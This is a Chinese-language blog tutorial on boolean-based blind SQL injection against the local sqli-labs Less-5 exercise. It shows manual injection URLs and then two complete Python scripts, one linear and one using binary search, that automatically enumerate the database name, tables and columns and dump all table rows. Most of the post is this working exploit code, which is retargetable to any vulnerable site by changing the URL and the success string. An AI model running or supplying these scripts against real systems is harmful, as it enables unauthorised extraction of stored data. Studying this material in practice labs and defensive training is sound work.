L0ne1y's Blog
0%

SQL盲注--布尔盲注

发表于 分类于
本文字数: 17k 阅读时长 ≈ 15 分钟

5fb6219adff12.jpg

布尔盲注

布尔型盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或者无法使用联合查询。

这里以一道题为例学习一下

正常传参,返回如下

1
http://127.0.0.1/sqli/Less-5/?id=1

存在注入点

1
http://127.0.0.1/sqli/Less-5/?id=1'

查字段数

1
http://127.0.0.1/sqli/Less-5/?id=1' order by 3--+

查数据库版本

1
http://127.0.0.1/sqli/Less-5/?id=1' and left((select version()),1)='5' --+

查数据库长度

这里需要一个一个试

1
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+

查数据库名

因为没有回显,所有不能使用以前得那样注入,这里使用left函数去逐位爆破数据库名,当结果正确返回you are in ……

1
http://127.0.0.1/sqli/Less-5/?id=1' and left((select database()),1)='s' --+

结果不正确什么也不返回

1
http://127.0.0.1/sqli/Less-5/?id=1' and left((select database()),1)='w' --+

脚本

手工爆破太麻烦,反正我是不会用手工去爆破,这里尝试使用脚本去爆破

第一种是通过一个一个字符去比较,爆破,特别慢,不推荐这种,大约需要半天吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
import requests

def db_ascii_list():
    ascii_list=[]
    for i in range(33,127):
        ascii_list.append(chr(i))
    return ascii_list

def db_length(url,str,ascii_list):
    print("[-]开始爆破数据库名长度.......")
    num=1
    while True:
        db_payload=url+"' and length(database())=%d --+"%num
        r=requests.get(db_payload)
        if str in r.text:
            db_length=num
            break
        else:
            num+=1
    print("[+]数据库长度:%d\n"%db_length)
    return db_length

def db_name(url,str,ascii_list,db_length):
    print("[-]开始爆破数据库名.......")
    db_name=''
    for i in range(1,db_length+1):
        for j in ascii_list:
            db_name_payload=url+"' and ord(mid((database()),%d,1))=%d --+"%(i,ord(j))
            #print(db_name_payload)
            r=requests.get(db_name_payload)
            if str in r.text:
                db_name+=j
                break
            else:
                pass
    print("[+]数据库名:%s\n"%db_name)
    return db_name

def tb_number(url,str,db_name):
    print("[-]开始爆破%s数据库有几张表........"%db_name)
    i=1
    while True:
        tb_payload=url+"' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+"%(db_name,i)
        #print(tb_payload)
        r=requests.get(tb_payload)
        if str in r.text:
            tb_number=i
            break
        else:
            i+=1
    print("[+]%s库一共有%d张表\n"%(db_name,tb_number))
    return tb_number

def tb_name_length(url,str,db_name,tb_number):
    print("[-]开始爆破表名长度")
    j=1
    tb_name_length=[]
    for i in range(tb_number):
        while True:
            tb_name_length_payload=url+"' and (select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d --+"%(db_name,i,j)
            #print(tb_name_length_payload)
            r=requests.get(tb_name_length_payload)
            if str in r.text:
                tb_name_length.append(j)
                j=1
                break
            else:
                j+=1
    print("[+]表名长度:%s"%tb_name_length)
    return tb_name_length

def tb_name(url,str,ascii_list,db_name,tb_number,tb_name_length):
    print("[-]开始爆破表名")
    tb_name_list=[]
    for i in range(tb_number):
        tb_name=''
        for j in range(1,tb_name_length[i]+1):
            for k in ascii_list:
                tb_name_payload=url+"' and ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))=%d --+"%(db_name,i,j,ord(k))
                r=requests.get(tb_name_payload)
                print(tb_name_payload)
                if str in r.text:
                    tb_name+=k
                    break
                else:
                    pass
        tb_name_list.append(tb_name)
    print("\n[+]%s库下的%d张表为:%s\n"%(db_name,tb_number,tb_name_list))
    return tb_name_list

def column_num(url,str,tb_name_list):
    print("[-]开始爆破每张表的字段数量........")
    column_num=[]
    j=1
    for i in tb_name_list:
        while True:
            column_num_payload=url+"' and (select count(column_name) from information_schema.columns where table_name='%s')=%d --+"%(i,j)
            #print(column_num_payload)
            r=requests.get(column_num_payload)
            if str in r.text:
                column_num.append(j)
                print("[+]%s表对应字段数为:%d"%(i,j))
                j=1
                break
            else:
                j+=1
    print("\n[+]%s表对应的字段数:%s\n"%(tb_name_list,column_num))
    return column_num

def column_name_length(url,str,tb_name_list,column_num):
    print("[-]开始爆破每张表的字段长度:")
    column_name_length=[]
    k=1
    for i in range(len(tb_name_list)):
        for j in range(column_num[i]):
            while True:
                column_name_length_payload=url+"' and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d --+"%(tb_name_list[i],j,k)
                #print(column_name_length_payload)
                r=requests.get(column_name_length_payload)
                if str in r.text:
                    column_name_length.append(k)
                    k=1
                    break
                else:
                    k+=1
    em_list_length=column_name_length[:column_num[0]]
    re_list_length=column_name_length[column_num[0]:column_num[1]+column_num[0]]
    ua_list_length=column_name_length[column_num[0]+column_num[1]:column_num[0]+column_num[1]+column_num[2]]
    us_list_length=column_name_length[column_num[0]+column_num[1]+column_num[2]:]
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[0],column_num[0],em_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[1],column_num[1],re_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[2],column_num[2],ua_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[3],column_num[3],us_list_length))
    return us_list_length

def column_name(url,str,ascii_list,tb_name_list,us_list_length):
    print("[-]开始爆破%s表的字段名:"%(tb_name_list[3]))
    column_name_list=[]
    for i in range(len(us_list_length)):
        column_name=''
        for j in range(1,us_list_length[i]+1):
            for k in ascii_list:
                column_name_payload=url+"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d --+"%(tb_name_list[3],i,j,ord(k))
                print(column_name_payload)
                r=requests.get(column_name_payload)
                if str in r.text:
                    column_name+=k
                    break
                else:
                    pass
        column_name_list.append(column_name)
    print("[+]%s表的字段名分别为:%s"%(tb_name_list[3],column_name_list))
    return column_name_list

def data_num(url,str,tb_list_name,db_name):
    print('[-]开始爆破%s数据库的%s表有几条数据:'%(db_name,tb_list_name[3]))
    i=1
    while True:
        data_num_payload=url+"' and (select count(*) from %s.%s)=%d --+"%(db_name,tb_list_name[3],i)
        print(data_num_payload)
        r=requests.get(data_num_payload)
        if str in r.text:
            data_num=i
            break
        else:
            i+=1
    print('[+]%s数据库的%s表有%d条数据'%(db_name,tb_list_name[3],data_num))
    return data_num

def dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list):
    print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3]))
    k=1
    data_length=[]
    dump_data_list=[]
    dump_data=''
    for i in column_name_list:
        for j in range(data_num):
            while True:
                dump_data_length_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1)) --+"%(i,db_name,tb_name_list[3],j,k)
                #print(dump_data_length_payload)
                r=requests.get(dump_data_length_payload)
                if str not in r.text:
                    dump_data_length=k-1
                    k=1
                    break
                else:
                    k+=1
            data_length.append(dump_data_length)
            for l in range(1,dump_data_length+1):
                for c in ascii_list:
                    dump_data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d --+"%(i,db_name,tb_name_list[3],j,l,ord(c))
                    #print(dump_data_payload)
                    r=requests.get(dump_data_payload)
                    if str in r.text:
                        dump_data+=c
                        break
                    else:
                        pass
            dump_data_list.append(dump_data)
            dump_data=''
            print( dump_data_list)
    print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3]))
    for i in range(13):
        print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i]))
    print( dump_data_list)

url="http://127.0.0.1/sqli/Less-5/?id=1"#目标url
str="You are in"#布尔型盲注的true&false的判断因素
ascii_list=db_ascii_list()
db_length=db_length(url,str,ascii_list)
db_name=db_name(url,str,ascii_list,db_length)
tb_number=tb_number(url,str,db_name)
tb_name_length=tb_name_length(url,str,db_name,tb_number)
tb_name_list=tb_name(url,str,ascii_list,db_name,tb_number,tb_name_length)
column_num=column_num(url,str,tb_name_list)
us_list_length=column_name_length(url,str,tb_name_list,column_num)
column_name_list=column_name(url,str,ascii_list,tb_name_list,us_list_length)
data_num=data_num(url,str,tb_name_list,db_name)
dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list)

第二种是通过二分法爆破,比较快,这个代码可能比较全了吧,如果师傅们发现有其他问题,欢迎指正。大约需要1个小时爆出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
import requests

def db_length(url,str):
    print("[-]开始爆破数据库名长度.......")
    num=1
    while True:
        db_payload=url+"' and length(database())=%d --+"%num
        r=requests.get(db_payload)
        if str in r.text:
            db_length=num
            break
        else:
            num+=1
    print("[+]数据库长度:%d\n"%db_length)
    return db_length

def db_name(url,str,db_length):
    print("[-]开始爆破数据库名.......")
    db_name=''
    for i in range(1,db_length+1):
        max=127
        min=33
        while abs(max-min)>1:
            midx=int((max+min)/2)
            db_name_payload=url+"' and ord(mid((database()),%d,1))>%d --+"%(i,midx)
            #print(db_name_payload)
            r=requests.get(db_name_payload)
            if str in r.text:
                min=midx
            else:
                max=midx
        db_name+=chr(max)
        print("[+]数据库名:%s\n"%db_name)
    return db_name

def tb_number(url,str,db_name):
    print("[-]开始爆破%s数据库有几张表........"%db_name)
    i=1
    while True:
        tb_payload=url+"' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+"%(db_name,i)
        #print(tb_payload)
        r=requests.get(tb_payload)
        if str in r.text:
            tb_number=i
            break
        else:
            i+=1
    print("[+]%s库一共有%d张表\n"%(db_name,tb_number))
    return tb_number

def tb_name_length(url,str,db_name,tb_number):
    print("[-]开始爆破表名长度")
    j=1
    tb_name_length=[]
    for i in range(tb_number):
        while True:
            tb_name_length_payload=url+"' and (select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d --+"%(db_name,i,j)
            #print(tb_name_length_payload)
            r=requests.get(tb_name_length_payload)
            if str in r.text:
                tb_name_length.append(j)
                j=1
                break
            else:
                j+=1
    print("[+]表名长度:%s"%tb_name_length)
    return tb_name_length

def tb_name(url,str,db_name,tb_number,tb_name_length):
    print("[-]开始爆破表名")
    tb_name_list=[]
    for i in range(tb_number):
        tb_name=''
        for j in range(1,tb_name_length[i]+1):
            max=127
            min=33
            while abs((max-min))>1:
                midx=int((max+min)/2)
                tb_name_payload=url+"' and ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))>%d --+"%(db_name,i,j,midx)
                r=requests.get(tb_name_payload)
                #print(tb_name_payload)
                if str in r.text:
                    min=midx
                else:
                    max=midx
            tb_name+=chr(max)
        tb_name_list.append(tb_name)
    print("\n[+]%s库下的%d张表为:%s\n"%(db_name,tb_number,tb_name_list))
    return tb_name_list

def column_num(url,str,tb_name_list):
    print("[-]开始爆破每张表的字段数量........")
    column_num=[]
    j=1
    for i in tb_name_list:
        while True:
            column_num_payload=url+"' and (select count(column_name) from information_schema.columns where table_name='%s')=%d --+"%(i,j)
            #print(column_num_payload)
            r=requests.get(column_num_payload)
            if str in r.text:
                column_num.append(j)
                print("[+]%s表对应字段数为:%d"%(i,j))
                j=1
                break
            else:
                j+=1
    print("\n[+]%s表对应的字段数:%s\n"%(tb_name_list,column_num))
    return column_num

def column_name_length(url,str,tb_name_list,column_num):
    print("[-]开始爆破每张表的字段长度:")
    column_name_length=[]
    k=1
    for i in range(len(tb_name_list)):
        for j in range(column_num[i]):
            while True:
                column_name_length_payload=url+"' and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d --+"%(tb_name_list[i],j,k)
                #print(column_name_length_payload)
                r=requests.get(column_name_length_payload)
                if str in r.text:
                    column_name_length.append(k)
                    k=1
                    break
                else:
                    k+=1
    em_list_length=column_name_length[:column_num[0]]
    re_list_length=column_name_length[column_num[0]:column_num[1]+column_num[0]]
    ua_list_length=column_name_length[column_num[0]+column_num[1]:column_num[0]+column_num[1]+column_num[2]]
    us_list_length=column_name_length[column_num[0]+column_num[1]+column_num[2]:]
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[0],column_num[0],em_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[1],column_num[1],re_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[2],column_num[2],ua_list_length))
    print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[3],column_num[3],us_list_length))
    return us_list_length

def column_name(url,str,tb_name_list,us_list_length):
    print("[-]开始爆破%s表的字段名:"%(tb_name_list[3]))
    column_name_list=[]
    for i in range(len(us_list_length)):
        column_name=''
        for j in range(1,us_list_length[i]+1):
            max=127
            min=33
            while abs(max-min)>1:
                midx=int((max+min)/2)
                column_name_payload=url+"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))>%d --+"%(tb_name_list[3],i,j,midx)
                print(column_name_payload)
                r=requests.get(column_name_payload)
                if str in r.text:
                    min=midx
                else:
                    max=midx
            column_name+=chr(max)
        column_name_list.append(column_name)
    print("[+]%s表的字段名分别为:%s"%(tb_name_list[3],column_name_list))
    return column_name_list

def data_num(url,str,tb_list_name,db_name):
    print('[-]开始爆破%s数据库的%s表有几条数据:'%(db_name,tb_list_name[3]))
    i=1
    while True:
        data_num_payload=url+"' and (select count(*) from %s.%s)=%d --+"%(db_name,tb_list_name[3],i)
        print(data_num_payload)
        r=requests.get(data_num_payload)
        if str in r.text:
            data_num=i
            break
        else:
            i+=1
    print('[+]%s数据库的%s表有%d条数据'%(db_name,tb_list_name[3],data_num))
    return data_num

def dump_data(url,str,tb_name_list,db_name,column_name_list,data_num):
    print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3]))
    k=1
    data_length=[]
    dump_data_list=[]
    dump_data=''
    for i in column_name_list:
        for j in range(data_num):
            while True:
                dump_data_length_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1)) --+"%(i,db_name,tb_name_list[3],j,k)
                #print(dump_data_length_payload)
                r=requests.get(dump_data_length_payload)
                if str not in r.text:
                    dump_data_length=k-1
                    k=1
                    break
                else:
                    k+=1
            data_length.append(dump_data_length)
            for l in range(1,dump_data_length+1):
                max=127
                min=33
                while abs(max-min)>1:
                    midx=int((max+min)/2)
                    dump_data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))>%d --+"%(i,db_name,tb_name_list[3],j,l,midx)
                    #print(dump_data_payload)
                    r=requests.get(dump_data_payload)
                    if str in r.text:
                        min=midx
                    else:
                        max=midx
                dump_data+=chr(max)
            dump_data_list.append(dump_data)
            dump_data=''
            #print( dump_data_list)
    print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3]))
    for i in range(13):
        print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i]))
        #print( dump_data_list)

url="http://127.0.0.1/sqli/Less-5/?id=1"#目标url
str="You are in"#布尔型盲注的true&false的判断因素=db_ascii_list()
db_length=db_length(url,str)
db_name=db_name(url,str,db_length)
tb_number=tb_number(url,str,db_name)
tb_name_length=tb_name_length(url,str,db_name,tb_number)
tb_name_list=tb_name(url,str,db_name,tb_number,tb_name_length)
column_num=column_num(url,str,tb_name_list)
us_list_length=column_name_length(url,str,tb_name_list,column_num)
column_name_list=column_name(url,str,tb_name_list,us_list_length)
data_num=data_num(url,str,tb_name_list,db_name)
dump_data(url,str,tb_name_list,db_name,column_name_list,data_num)